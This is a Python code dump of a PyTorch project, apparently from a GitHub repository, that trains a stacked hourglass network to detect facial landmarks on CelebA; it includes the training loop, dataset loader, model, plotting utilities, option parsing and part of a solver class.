{\n photon_torpedos = value;\n}\n\nvoid Game::hitKlingon( Klingon* enemy, int damage, Galaxy& galaxy )\n{\n enemy->hit( damage );\n\n if ( enemy->isDead() )\n {\n galaxy.writeLine(\"Klingon destroyed!\");\n enemy->destroy();\n }\n else\n {\n stringstream message;\n message << \"Klingon has \" << enemy->energy() << \" remaining\";\n galaxy.writeLine(message.str());\n }\n}\n\nbool Game::hasEnoughPhaserAmmo( int amount )\n{\n return phaser_ammo >= amount;\n}\n\nbool Game::hasEnoughPhotoTorpedos()\n{\n return photon_torpedos > 0;\n}\n\nvoid Game::reducePhaserAmmo( int amount )\n{\n phaser_ammo -= amount;\n}\n\nvoid Game::reducePhotoTorpedos()\n{\n --photon_torpedos;\n}\n\nvoid Game::attackWithPhaser( Klingon* enemy, int amount, int distance,\n Galaxy& galaxy )\n{\n if ( hasEnoughPhaserAmmo( amount ) ) {\n if ( !m_phaser.arePhasersInRange(distance) ) {\n stringstream message;\n message << \"Klingon out of range of phasers at \" << distance << \" sectors...\";\n galaxy.writeLine(message.str());\n } else {\n int damage = m_phaser.getPhaserDamage( amount, distance );\n stringstream message;\n message << \"Phasers hit Klingon at \" << distance << \" sectors with \" << damage << \" units\";\n galaxy.writeLine(message.str());\n hitKlingon( enemy, damage, galaxy );\n }\n reducePhaserAmmo( amount );\n\n } else {\n galaxy.writeLine(\"Insufficient energy to fire phasers!\");\n }\n}\n\nvoid Game::attackPhotonTorpedo( Klingon* enemy, int distance, Galaxy& galaxy )\n{\n if ( hasEnoughPhotoTorpedos() ) {\n if ( !m_photon_torp.didTorpedoHit( distance ) ) {\n photonTorpedoMissed( distance, galaxy );\n } else {\n int damage = m_photon_torp.getPhotonTorpDamage();\n stringstream message;\n message << \"Photons hit Klingon at \" << distance << \" sectors with \" << damage << \" units\";\n galaxy.writeLine(message.str());\n\n hitKlingon( enemy, damage, galaxy );\n }\n reducePhotoTorpedos();\n\n } else {\n galaxy.writeLine(\"No more photon torpedoes!\");\n }\n}\n\nvoid Game::photonTorpedoMissed( int distance, Galaxy& galaxy )\n{\n stringstream message;\n message << \"Torpedo missed Klingon at \" << distance << \" sectors...\";\n galaxy.writeLine(message.str());\n}\n\n}\n"
},
{
"alpha_fraction": 0.6437994837760925,
"alphanum_fraction": 0.6437994837760925,
"avg_line_length": 17.899999618530273,
"blob_id": "6adaf7413bfbd824a70a6a08690d3529e4372e69",
"content_id": "a36ca2a9834a677c664e3fc2dae0a67764d15dc2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 379,
"license_type": "permissive",
"max_line_length": 49,
"num_lines": 20,
"path": "/SuperSet/SuperSet/Set.h",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#pragma once\n\n#include <vector>\n\nclass Set\n{\npublic:\n Set(void);\n ~Set(void);\n\n bool isEmpty() const;\n void add( unsigned int to_add );\n bool contains( unsigned int to_check ) const;\n void remove( unsigned int to_remove );\n Set getIntersection( const Set& other );\n Set getUnion( const Set& other );\n\nprivate:\n std::vector<unsigned int> m_storage;\n};\n\n"
},
{
"alpha_fraction": 0.639356791973114,
"alphanum_fraction": 0.6424195766448975,
"avg_line_length": 33.394737243652344,
"blob_id": "d52a15769d022435d8ca4caed25ca236dd20dbc9",
"content_id": "ea4f1a8f42b25a4815ba97cea6224ef923401268",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1306,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 38,
"path": "/password_tester/password.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "import string\n\nclass CharacterInString:\n def __init__(self, characters, string):\n self.characters = characters\n self.string = string\n \n def evaluate(self):\n for char in self.characters:\n if char in self.string:\n return True\n return False\n \nclass LengthOfString:\n def __init__(self, required_length, string):\n self.required_length = required_length\n self.string = string\n \n def evaluate(self):\n return len(self.string) > self.required_length\n\ndef check(password, admin=False):\n errors = set()\n \n def validate( validateclass, exception ):\n if not validateclass.evaluate():\n errors.add(exception)\n \n validate( LengthOfString( 7, password ), 'TooShortException' )\n validate( CharacterInString( string.ascii_letters, password ), 'NoAlphabeticException')\n validate( CharacterInString( string.digits, password), 'NoDigitException')\n if admin:\n validate(LengthOfString(10, password),'AdminTooShortException')\n validate(CharacterInString(string.punctuation, password), 'AdminNoSpecialCharacterException')\n validate(CharacterInString(password[-1:], string.punctuation+string.digits), \n 'AdminLastCharacterIsNotSpecialOrNumber') \n \n return errors"
},
{
"alpha_fraction": 0.7018970251083374,
"alphanum_fraction": 0.7018970251083374,
"avg_line_length": 15.772727012634277,
"blob_id": "b93030b340620cf759f2590051bd08a196ed5035",
"content_id": "22112342d091822d46529dd6d9ed5fcd0107c223",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 369,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 22,
"path": "/LunEx/src/stockquote.h",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#ifndef STOCKQUOTE_H\n#define STOCKQUOTE_H\n\n#include <string>\n\nclass LunExServices;\n\nclass StockQuote\n{\npublic:\n StockQuote( std::string symbol, LunExServices& service );\n\n double Price( double shares ) const;\n double Total( double shares ) const;\n\nprivate:\n double m_price;\n std::string m_symbol;\n LunExServices& m_service;\n};\n\n#endif // STOCKQUOTE_H\n"
}
] | 32 |
Steve-Tod/hourglass-face-landmark
|
https://github.com/Steve-Tod/hourglass-face-landmark
|
f401dcbe261a006dec6015900bf869411fa319b3
|
7ccb81fff756a3001e48c3c3498399808c662d03
|
b4248ae10faf10bd73c203e7713ed0570ffeb978
|
refs/heads/master
| 2021-07-12T04:44:32.496859 | 2020-07-17T00:04:15 | 2020-07-17T00:04:15 | 181,874,724 | 6 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.561279296875,
"alphanum_fraction": 0.566650390625,
"avg_line_length": 42.11579132080078,
"blob_id": "cbebaeee6731f47e2462444fab21ec9628f23736",
"content_id": "d36771db717b4f5c7bbb02ab6bb437a3bfa7e109",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4096,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 95,
"path": "/train.py",
"repo_name": "Steve-Tod/hourglass-face-landmark",
"src_encoding": "UTF-8",
"text": "import argparse, random, pprint, os\nfrom tqdm import tqdm\nfrom options.options import parse_opt\nfrom utils import utils\n\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Train Hourglass Model')\n parser.add_argument('-opt', type=str, required=True, help='Path to options JSON file.')\n opt = parse_opt(parser.parse_args().opt)\n \n from data import create_dataloader\n from solver.HourGlassSover import HourGlassSover\n\n pprint.pprint(opt)\n train_dl = create_dataloader(opt['datasets']['train'])\n print('===> Train Dataset created, Number of images: [%d]' % (len(train_dl) * opt['datasets']['train']['batch_size']))\n val_dl = create_dataloader(opt['datasets']['val'])\n print('===> Validation Dataset created, Number of images: [%d]' % (len(val_dl)))\n\n solver = HourGlassSover(opt)\n\n if opt['use_tb_logger']:\n from tensorboardX import SummaryWriter\n tb_logger = SummaryWriter(log_dir=opt['path']['tb_logger_root'])\n print('===> tensorboardX logger created, log to %s' % (opt['path']['tb_logger_root']))\n\n NUM_EPOCH = opt['train']['num_epochs']\n current_step = 0\n start_epoch = solver.cur_epoch\n \n for epoch in range(start_epoch, NUM_EPOCH + 1):\n solver.cur_epoch = epoch\n \n print('===> Train epoch %3d, learning rate: %.4f' % (epoch, solver.get_current_learning_rate()))\n solver.records['lr'].append(solver.get_current_learning_rate())\n with tqdm(total=len(train_dl), desc='Epoch: [%d/%d]'%(epoch, NUM_EPOCH), miniters=1) as t:\n train_loss = []\n for i, sample in enumerate(train_dl):\n solver.feed_data(sample)\n loss = solver.train_step()\n train_loss.append(loss)\n if current_step % opt['train']['log_interval'] == 0 and current_step > 0:\n tb_logger.add_scalar('train loss', loss, global_step=current_step)\n current_step += 1\n t.set_postfix_str(\"Batch Loss: %.4f\" % loss)\n t.update()\n mean_train_loss = sum(train_loss) / len(train_loss)\n solver.records['train_loss'].append(mean_train_loss)\n print('\\nEpoch: [%d/%d] Avg Train Loss: %.6f' % (epoch, NUM_EPOCH, mean_train_loss))\n \n print('===> Validate epoch %3d' % (epoch))\n val_loss = []\n nme_all = []\n with tqdm(total=len(val_dl), desc='Epoch: [%d/%d]'%(epoch, NUM_EPOCH), miniters=1) as t:\n for i, sample in enumerate(val_dl):\n solver.feed_data(sample)\n img_name = os.path.basename(sample['path'][0])\n loss = solver.evaluate()\n val_loss.append(loss)\n nme = solver.calc_nme()\n nme_all.append(nme)\n if i < opt['train']['num_save_image']:\n solver.log_current_visual(img_name, tb_logger, current_step)\n solver.save_current_visual(img_name, epoch)\n t.set_postfix_str(\"Val Loss: %.4f, NME: %.4f\" % (loss, nme))\n t.update()\n \n epoch_is_best = False\n mean_val_loss = sum(val_loss) / len(val_loss)\n mean_nme = sum(nme_all) / len(nme_all)\n if solver.best_pred > mean_nme:\n solver.best_pred = mean_nme\n solver.best_epoch = epoch\n epoch_is_best = True\n \n solver.records['val_loss'].append(mean_val_loss)\n solver.records['nme'].append(mean_nme)\n if opt['use_tb_logger']:\n tb_logger.add_scalar('val loss', mean_val_loss, global_step=current_step)\n tb_logger.add_scalar('nme', mean_nme, global_step=current_step)\n \n print('Epoch: %03d, Mean NME: %.4f, Mean loss: %.4f\\nBest Epoch: %03d, Best NME: %.4f' % \n (epoch, mean_nme, mean_val_loss, solver.best_epoch, solver.best_pred))\n \n solver.update_learning_rate(epoch)\n solver.save_checkpoint(epoch, epoch_is_best)\n solver.save_current_log()\n\n \n print('===> Finished !')\n \nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.8186812996864319,
"alphanum_fraction": 0.8186812996864319,
"avg_line_length": 44.5,
"blob_id": "56bfd71d780e3cb99815da398498b0f8475594b4",
"content_id": "359d6cae4f00e5364ff652d9d39d4040e8b63530",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 182,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 4,
"path": "/README.md",
"repo_name": "Steve-Tod/hourglass-face-landmark",
"src_encoding": "UTF-8",
"text": "# hourglass-face-landmark\nFace landmark detection using hourglass model\n\nCode for Hourglass model from this [repo](https://github.com/raymon-tian/hourglass-facekeypoints-detection).\n"
},
{
"alpha_fraction": 0.49341341853141785,
"alphanum_fraction": 0.5131731629371643,
"avg_line_length": 41.6694221496582,
"blob_id": "c329f2ade92c26ce20cea926c1d9860aa4667411",
"content_id": "ae8f2aab141ff9609fd1812c7dddc4916f9b5339",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5162,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 121,
"path": "/data/dataset.py",
"repo_name": "Steve-Tod/hourglass-face-landmark",
"src_encoding": "UTF-8",
"text": "import re, os, random\nfrom PIL import Image\nimport numpy as np\nimport torch\nfrom torchvision import transforms\nimport torch.utils.data as data\n\nclass FaceLandmarkDataset(data.Dataset):\n def __init__(self, opt):\n super(FaceLandmarkDataset, self).__init__()\n self.opt = opt\n self.train = (opt['phase'] == 'train')\n self.info_list = self._get_info_list(opt)\n self.transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(\n mean=opt['mean'], std=[1.0, 1.0, 1.0])\n ])\n\n def __getitem__(self, index):\n info = self.info_list[index]\n img = Image.open(info[0])\n img, landmark, landmark_original = self._resize(img, info[1])\n gt = self._generate_gt((img.size[0] // 4, img.size[1] // 4), landmark,\n self.opt['gt_sigma']) # C*H*W\n img, gt = self._random_modify(img, gt)\n img = self.transform(img)\n gt = torch.from_numpy(np.ascontiguousarray(gt))\n return {'img': img, 'heatmap_gt': gt, 'path': info[0], 'landmark_gt': np.array(landmark_original)}\n\n def __len__(self):\n return len(self.info_list)\n\n def _resize(self, img, landmark):\n width, height = img.size\n new_width, new_height = min(width, height), min(width, height)\n left = (width - new_width)//2\n top = (height - new_height)//2\n right = (width + new_width)//2\n bottom = (height + new_height)//2\n\n cropped = img.crop((left, top, right, bottom))\n resized = cropped.resize((self.opt['input_length'], self.opt['input_length']), Image.BICUBIC)\n scale_0 = 1.0 * self.opt['input_length'] / new_width\n scale = 0.25 * scale_0 # 0.25 time resolution\n landmark_original = [((x[0] - left)*scale_0, (x[1] - top)*scale_0) for x in landmark]\n #landmark_resized = [(round((x[0] - left)*scale), round((x[1] - top)*scale)) for x in landmark]\n landmark_resized = [((x[0] - left)*scale, (x[1] - top)*scale) for x in landmark]\n return resized, landmark_resized, landmark_original\n \n def _random_modify(self, img, gt):\n if random.random() > 0.5 and self.opt['flip_v']:\n img = img.transpose(Image.FLIP_TOP_BOTTOM)\n gt = np.flip(gt, 1)\n if random.random() > 0.5 and self.opt['flip_h']:\n img = img.transpose(Image.FLIP_LEFT_RIGHT)\n gt = np.flip(gt, 2)\n if self.opt['rotate']:\n rot_rand = random.random()\n if rot_rand > 0.75:\n img = img.transpose(Image.ROTATE_90)\n gt = np.rot90(gt, k=1, axes=(1, 2))\n elif rot_rand > 0.5:\n img = img.transpose(Image.ROTATE_180)\n gt = np.rot90(gt, k=2, axes=(1, 2))\n elif rot_rand > 0.25:\n img = img.transpose(Image.ROTATE_270)\n gt = np.rot90(gt, k=3, axes=(1, 2))\n return img, gt\n\n def _generate_gt(self, size, landmark_list, sigma):\n heatmap_list = [\n self._generate_one_heatmap(size, l, sigma) for l in landmark_list\n ]\n return np.stack(heatmap_list, axis=0)\n\n def _generate_one_heatmap(self, size, landmark, sigma):\n w, h = size\n x_range = np.arange(start=0, stop=w, dtype=int)\n y_range = np.arange(start=0, stop=h, dtype=int)\n xx, yy = np.meshgrid(x_range, y_range)\n d2 = (xx - landmark[0])**2 + (yy - landmark[1])**2\n exponent = d2 / 2.0 / sigma / sigma\n heatmap = np.exp(-exponent)\n return heatmap\n\n def _get_info_list(self, opt):\n info_list = []\n if opt['type'] == 'celebA':\n img_root = opt['image_root']\n with open(opt['annotation_path'], 'r') as f:\n anno_list = f.read().strip('\\n').split('\\n')[2:]\n with open(opt['partition_path'], 'r') as f:\n part_list = sorted(f.read().strip('\\n').split('\\n'))\n for i, anno in enumerate(sorted(anno_list)):\n if opt['phase'] == 'train':\n if part_list[i][-1] != '0':\n continue\n elif opt['phase'] == 'val':\n if part_list[i][-1] != '1':\n continue\n elif opt['phase'] == 'test':\n if part_list[i][-1] != '2':\n continue\n else:\n raise NotImplementedError(\n 'Dataset phase %s is not recognized' % (opt['phase']))\n\n split = re.split('\\W+', anno)\n img_name = split[0] + '.' + split[1]\n assert len(split) == opt['num_keypoints'] * 2 + 2\n landmark = []\n for i in range(opt['num_keypoints']):\n landmark.append((int(split[2 * i + 2]), int(split[2 * i + 3])))\n info_list.append((os.path.join(img_root, img_name), landmark))\n else:\n raise NotImplementedError(\n 'Dataset type %s is not recognized' % (opt['type']))\n if not self.train:\n info_list = info_list[:1000]\n return info_list"
},
{
"alpha_fraction": 0.4947039484977722,
"alphanum_fraction": 0.5184928178787231,
"avg_line_length": 37.400001525878906,
"blob_id": "92275ccc65deb0a8b61c0799d36a48a8bd90a1cc",
"content_id": "b2cd4ec9e76b45c3cd817f2cc663e1a77445928f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5759,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 150,
"path": "/model.py",
"repo_name": "Steve-Tod/hourglass-face-landmark",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.nn as nn\n\nclass StackedHourGlass(nn.Module):\n def __init__(self, opt):\n super(StackedHourGlass, self).__init__()\n self.opt = opt\n self.num_feature = opt['num_feature']\n self.num_stack = opt['num_stack']\n self.pre_conv_block = nn.Sequential(\n nn.Conv2d(3, self.num_feature // 4, 7, 2, 3),\n nn.BatchNorm2d(self.num_feature // 4),\n nn.ReLU(inplace=True),\n ResidualBlock(self.num_feature // 4, self.num_feature // 2),\n nn.MaxPool2d(2, 2),\n ResidualBlock(self.num_feature // 2, self.num_feature // 2),\n ResidualBlock(self.num_feature // 2, self.num_feature),\n )\n self._init_stacked_hourglass()\n\n def _init_stacked_hourglass(self):\n for i in range(self.num_stack):\n setattr(self, 'hg' + str(i), HourGlass(self.opt['num_layer'], self.num_feature))\n setattr(self, 'hg' + str(i) + '_res1',\n ResidualBlock(self.num_feature, self.num_feature))\n setattr(self, 'hg' + str(i) + '_lin1',\n Lin(self.num_feature, self.num_feature))\n setattr(self, 'hg' + str(i) + '_conv_pred',\n nn.Conv2d(self.num_feature, self.opt['num_keypoints'], 1))\n if i < self.num_stack - 1:\n setattr(self, 'hg' + str(i) + '_conv1',\n nn.Conv2d(self.num_feature, self.num_feature, 1))\n setattr(self, 'hg' + str(i) + '_conv2',\n nn.Conv2d(self.opt['num_keypoints'], self.num_feature, 1))\n \n def forward(self,x):\n x = self.pre_conv_block(x) #(n,256,32,32)\n\n out = []\n inter = x\n\n for i in range(self.num_stack):\n hg = eval('self.hg'+str(i))(inter)\n # Residual layers at output resolution\n ll = hg\n ll = eval('self.hg'+str(i)+'_res1')(ll)\n # Linear layer to produce first set of predictions\n ll = eval('self.hg'+str(i)+'_lin1')(ll)\n # Predicted heatmaps\n tmpOut = eval('self.hg'+str(i)+'_conv_pred')(ll)\n out.append(tmpOut)\n # Add predictions back\n if i < self.num_stack - 1:\n ll_ = eval('self.hg'+str(i)+'_conv1')(ll)\n tmpOut_ = eval('self.hg'+str(i)+'_conv2')(tmpOut)\n inter = inter + ll_ + tmpOut_\n return out\n\n \nclass GHCU(nn.Module):\n def __init__(self, opt):\n super(GHCU, self).__init__()\n self.feature = nn.Sequential(\n self.conv_block(opt['in_channel'], 64, 5, 2), # B*64*16*16\n self.conv_block(64, 32, 5, 2), # B*32*8*8\n self.conv_block(32, 16, 3, 2), # B*16*4*4\n )\n self.regressor = nn.Sequential(\n nn.Linear(opt['feature_length'], 256),\n nn.Dropout2d(opt['drop_rate']), nn.ReLU(inplace=True),\n nn.Linear(256, opt['output_dim']))\n\n def forward(self, x):\n x = self.feature(x)\n x = self.regressor(x.view(x.size()[0], -1))\n return x\n\n def conv_block(self, num_in, num_out, kernel_size, stride, padding=None):\n if not padding:\n padding = (kernel_size - 1) // 2\n return nn.Sequential(\n nn.Conv2d(num_in, num_out, kernel_size, stride, padding),\n nn.BatchNorm2d(num_out), nn.ReLU(inplace=True))\n \n \nclass HourGlass(nn.Module):\n def __init__(self, num_layer, num_feature):\n super(HourGlass, self).__init__()\n self._n = num_layer\n self._f = num_feature\n self._init_layers(self._n, self._f)\n\n def _init_layers(self, n, f):\n setattr(self, 'res' + str(n) + '_1', ResidualBlock(f, f))\n setattr(self, 'pool' + str(n) + '_1', nn.MaxPool2d(2, 2))\n setattr(self, 'res' + str(n) + '_2', ResidualBlock(f, f))\n if n > 1:\n self._init_layers(n - 1, f)\n else:\n self.res_center = ResidualBlock(f, f)\n setattr(self, 'res' + str(n) + '_3', ResidualBlock(f, f))\n\n def _forward(self, x, n, f):\n up1 = eval('self.res' + str(n) + '_1')(x)\n\n low1 = eval('self.pool' + str(n) + '_1')(x)\n low1 = eval('self.res' + str(n) + '_2')(low1)\n if n > 1:\n low2 = self._forward(low1, n - 1, f)\n else:\n low2 = self.res_center(low1)\n low3 = low2\n low3 = eval('self.' + 'res' + str(n) + '_3')(low3)\n up2 = nn.functional.interpolate(low3, scale_factor=2, mode='bilinear', align_corners=True)\n\n return up1 + up2\n\n def forward(self, x):\n return self._forward(x, self._n, self._f)\n \n\nclass Lin(nn.Module):\n def __init__(self,numIn,numout):\n super(Lin,self).__init__()\n self.conv_block = nn.Sequential(\n nn.Conv2d(numIn,numout,1), \n nn.BatchNorm2d(numout),\n nn.ReLU(inplace=True)\n )\n def forward(self,x):\n return self.conv_block(x)\n \n \nclass ResidualBlock(nn.Module):\n def __init__(self, num_in, num_out):\n super(ResidualBlock, self).__init__()\n self.conv_block = nn.Sequential(\n nn.Conv2d(num_in, num_out // 2, 1), nn.BatchNorm2d(num_out // 2),\n nn.ReLU(inplace=True),\n nn.Conv2d(num_out // 2, num_out // 2, 3, stride=1, padding=1),\n nn.BatchNorm2d(num_out // 2), nn.ReLU(inplace=True),\n nn.Conv2d(num_out // 2, num_out, 1), nn.BatchNorm2d(num_out))\n self.skip_layer = None if num_in == num_out else nn.Sequential(\n nn.Conv2d(num_in, num_out, 1), nn.BatchNorm2d(num_out))\n \n def forward(self, x):\n residual = self.conv_block(x)\n if self.skip_layer:\n x = self.skip_layer(x)\n return x + residual"
},
{
"alpha_fraction": 0.5907719135284424,
"alphanum_fraction": 0.619663655757904,
"avg_line_length": 33.62686538696289,
"blob_id": "b9883ee17f78b34291bb36a25646ee723da143ab",
"content_id": "d00a532cc35c2d34a5570dcd8ed48a19d58798d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2319,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 67,
"path": "/utils/utils.py",
"repo_name": "Steve-Tod/hourglass-face-landmark",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\ndef get_peak_points(heatmaps):\n \"\"\"\n :param heatmaps: numpy array (N, 5, 32, 32)\n :return: numpy array (N, 5, 2)\n \"\"\"\n N,C,H,W = heatmaps.shape\n all_peak_points = []\n for i in range(N):\n peak_points = []\n for j in range(C):\n yy,xx = np.where(heatmaps[i,j] == heatmaps[i,j].max())\n y = yy[0]\n x = xx[0]\n peak_points.append([x,y])\n all_peak_points.append(peak_points)\n all_peak_points = np.array(all_peak_points)\n return all_peak_points\n\ndef merge_and_scale_heatmap(heatmap, scale):\n merged = np.mean(heatmap, axis=0)\n h, w = merged.shape\n scaled = cv2.resize(merged, dsize=(h * scale, w * scale), interpolation=cv2.INTER_LINEAR)\n return scaled\n\ndef plot_heatmap(heatmap, img, mean, scale=4, alpha=0.5):\n '''\n merge heatmaps of different points into one heatmap\n :param heatmap: numpy array (5, 32, 32)\n :param img: image array (3, 128, 128)\n :param mean: mean rgb of dataset\n :param scale: scale factor\n :param alpha: float alpha\n '''\n scaled = merge_and_scale_heatmap(heatmap, scale)\n img_s = np.transpose(np.clip(img + mean, 0, 1), (1, 2, 0))\n fig_withhm = plt.figure()\n plt.imshow(img_s)\n plt.imshow(scaled, cmap='hot', alpha=alpha)\n plt.axis('off')\n return fig_withhm\n\ndef plot_heatmap_compare(heatmaps, heatmap_gt, img, mean, scale=4, alpha=0.5):\n '''\n merge heatmaps of different points into one heatmap\n :param heatmaps: list of numpy array [(5, 32, 32)]\n :param heatmap_gt: numpy array (5, 32, 32) ground truth\n :param img: image array (3, 128, 128)\n :param mean: mean rgb of dataset (3, 1, 1)\n :param scale: scale factor\n :param alpha: float alpha\n '''\n scaled = [merge_and_scale_heatmap(x, scale) for x in heatmaps]\n scaled_gt = merge_and_scale_heatmap(heatmap_gt, scale)\n img_s = np.transpose(np.clip(img + mean, 0, 1), (1, 2, 0))\n img_s = np.concatenate([img_s for _ in range(len(heatmaps) + 1)], axis=1)\n scaled.insert(0, scaled_gt)\n \n scaled_s = np.concatenate(scaled, axis=1)\n fig_withhm = plt.figure(figsize=(2*len(scaled), 2))\n plt.imshow(img_s)\n plt.imshow(scaled_s, cmap='hot', alpha=alpha)\n plt.axis('off')\n return fig_withhm"
},
{
"alpha_fraction": 0.49602964520454407,
"alphanum_fraction": 0.49708840250968933,
"avg_line_length": 39.212764739990234,
"blob_id": "989eaa12ae4078a6faa49077b380981b10d2d13c",
"content_id": "7495ef0d4f1fdc34cc98d5ffdc72f91271338240",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1889,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 47,
"path": "/options/options.py",
"repo_name": "Steve-Tod/hourglass-face-landmark",
"src_encoding": "UTF-8",
"text": "import os, json\n\n\ndef parse_opt(opt_path):\n with open(opt_path, 'r') as f:\n opt = json.load(f)\n # export CUDA_VISIBLE_DEVICES\n if opt['use_gpu']:\n gpu_list = ','.join(str(x) for x in opt['gpu_ids'])\n os.environ['CUDA_VISIBLE_DEVICES'] = gpu_list\n print('===> Export CUDA_VISIBLE_DEVICES = [' + gpu_list + ']')\n else:\n print('===> CPU mode is set (NOTE: GPU is recommended)')\n \n # path\n exp_name = opt['name']\n opt['path']['exp_root'] = os.path.join(opt['path']['root_path'],\n 'experiments', exp_name)\n assert os.path.exists(opt['path']['exp_root']) == opt['resume'] # make sure no conflict\n opt['path']['checkpoint_dir'] = os.path.join(opt['path']['exp_root'],\n 'checkpoint')\n opt['path']['visual_dir'] = os.path.join(opt['path']['exp_root'],\n 'visualization')\n opt['path']['tb_logger_root'] = opt['path']['exp_root'].replace(\n 'experiments', 'tb_logger')\n if not opt['resume']:\n for k, v in opt['path'].items():\n if k == 'root_path':\n continue\n elif k == 'tb_logger_root':\n if opt['use_tb_logger']:\n os.makedirs(v)\n else:\n os.makedirs(v)\n \n # dataset\n for k, v in opt['datasets'].items():\n opt['datasets'][k]['phase'] = k\n opt['datasets'][k]['num_keypoints'] = opt['num_keypoints']\n\n # network\n opt['networks']['hourglass']['num_keypoints'] = opt['num_keypoints']\n opt['networks']['ghcu']['output_dim'] = 2 * opt['num_keypoints']\n opt['networks']['ghcu']['in_channel'] = opt['num_keypoints']\n with open(os.path.join(opt['path']['exp_root'], 'opt.json'), 'w') as f:\n json.dump(opt, f, indent=4)\n return opt"
},
{
"alpha_fraction": 0.7248322367668152,
"alphanum_fraction": 0.7248322367668152,
"avg_line_length": 36.375,
"blob_id": "32a9e6c377a6fb38a9e6ace0d041c9655bd815d5",
"content_id": "f614fca3bb860006f501e29837f8eaf3708f94e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 298,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 8,
"path": "/data/__init__.py",
"repo_name": "Steve-Tod/hourglass-face-landmark",
"src_encoding": "UTF-8",
"text": "from .dataset import FaceLandmarkDataset\nfrom torch.utils.data import DataLoader\n\ndef create_dataloader(opt):\n ds = FaceLandmarkDataset(opt)\n shuffle = opt['phase'] == 'train'\n dl = DataLoader(ds, batch_size=opt['batch_size'], num_workers=opt['num_workers'], shuffle=shuffle)\n return dl"
},
{
"alpha_fraction": 0.518311083316803,
"alphanum_fraction": 0.5218666791915894,
"avg_line_length": 37.395904541015625,
"blob_id": "ac84ba7668558b19f5ec92f57541c2bf859e0c7b",
"content_id": "d2480bb1f60dffde456dfb65ccca189375580f25",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11250,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 293,
"path": "/solver/HourGlassSover.py",
"repo_name": "Steve-Tod/hourglass-face-landmark",
"src_encoding": "UTF-8",
"text": "import argparse, pprint, os\nimport numpy as np\nimport pandas as pd\n\nimport torch\nfrom torch import optim, nn\nfrom torch.utils.data import DataLoader\n\nfrom utils import utils\nfrom model import StackedHourGlass\n\n\nclass HourGlassSover(object):\n def __init__(self, opt):\n super(HourGlassSover, self).__init__()\n self.opt = opt\n self.is_train = opt['is_train']\n self.use_gpu = opt['use_gpu'] and torch.cuda.is_available()\n self.exp_root = opt['path']['exp_root']\n self.checkpoint_dir = opt['path']['checkpoint_dir']\n self.visual_dir = opt['path']['visual_dir']\n self.records = {'epoch': [],\n 'train_loss': [],\n 'val_loss': [],\n 'lr': [],\n 'nme': []\n }\n self.best_epoch = 0\n self.cur_epoch = 1\n self.best_pred = 1.0\n self.model = self._create_model(opt['networks'])\n if self.use_gpu:\n self.model = net = nn.DataParallel(self.model).cuda()\n\n self.print_network()\n if self.is_train:\n self.train_opt = opt['train']\n # set loss\n loss_type = self.train_opt['loss_type']\n if loss_type == 'l1':\n self.criterion = nn.L1Loss()\n elif loss_type == 'l2':\n self.criterion = nn.MSELoss()\n else:\n raise NotImplementedError(\n 'Loss type [%s] is not implemented!' % loss_type)\n if self.use_gpu:\n self.criterion = self.criterion.cuda()\n\n # set optimizer\n weight_decay = self.train_opt['weight_decay'] if self.train_opt[\n 'weight_decay'] else 0\n optim_type = self.train_opt['optimizer'].upper()\n if optim_type == \"ADAM\":\n self.optimizer = optim.Adam(\n self.model.parameters(),\n lr=self.train_opt['learning_rate'],\n weight_decay=weight_decay)\n elif optim_type == \"RMSPROP\":\n self.optimizer = optim.RMSprop(\n self.model.parameters(),\n lr=self.train_opt['learning_rate'],\n weight_decay=weight_decay)\n else:\n raise NotImplementedError(\n 'Loss type [%s] is not implemented!' % optim_type)\n\n # set lr_scheduler\n if self.train_opt['lr_scheme'].lower() == 'multisteplr':\n self.scheduler = optim.lr_scheduler.MultiStepLR(\n self.optimizer, self.train_opt['lr_steps'],\n self.train_opt['lr_gamma'])\n else:\n raise NotImplementedError(\n 'Only MultiStepLR scheme is supported!')\n\n self.load()\n \n print('===> Solver Initialized : [%s] || Use GPU : [%s]' %\n (self.__class__.__name__, self.use_gpu))\n\n if self.is_train:\n print(\"optimizer: \", self.optimizer)\n print(\"lr_scheduler milestones: %s gamma: %f\" %\n (self.scheduler.milestones, self.scheduler.gamma))\n\n def feed_data(self, batch):\n self.sample = batch['img']\n self.target = batch['heatmap_gt']\n self.path = batch['path']\n self.landmark_gt = batch['landmark_gt']\n if self.use_gpu:\n self.sample = self.sample.float().cuda()\n self.target = self.target.float().cuda()\n\n def train_step(self):\n self.model.train()\n 